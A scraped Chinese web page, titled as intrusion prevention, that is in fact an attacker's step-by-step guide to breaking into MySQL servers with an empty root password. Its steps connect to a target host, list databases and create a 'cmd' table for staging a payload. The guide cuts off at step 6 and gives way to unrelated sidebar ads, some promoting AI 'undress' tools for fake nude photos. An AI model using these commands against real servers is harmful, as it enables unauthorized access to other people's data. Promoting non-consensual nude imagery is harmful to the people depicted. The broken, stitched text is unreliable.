如何防止入侵:My SQL各种攻击方法大全
MYSQL用户ROOT密码为空时是一个很大的漏洞,在网上也有许多一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??
后来,自己思索想到一个办法,且在测试的几台有此漏洞的机中均获得了成功,现将攻击方法公布如下:
1、连接到对方MYSQL 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中
2、让我们来看看服务器中有些什么数据库
mysql>show databases;
MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test;
我们将会进入test数据库中
4、查看我们进入数据库中有些什么数据表
mysql>show tables;
默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
6、在表中插入内容
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SublimeText3 Chinese version
Chinese version, very easy to use
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
Notepad++7.3.1
Easy-to-use and free code editor
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
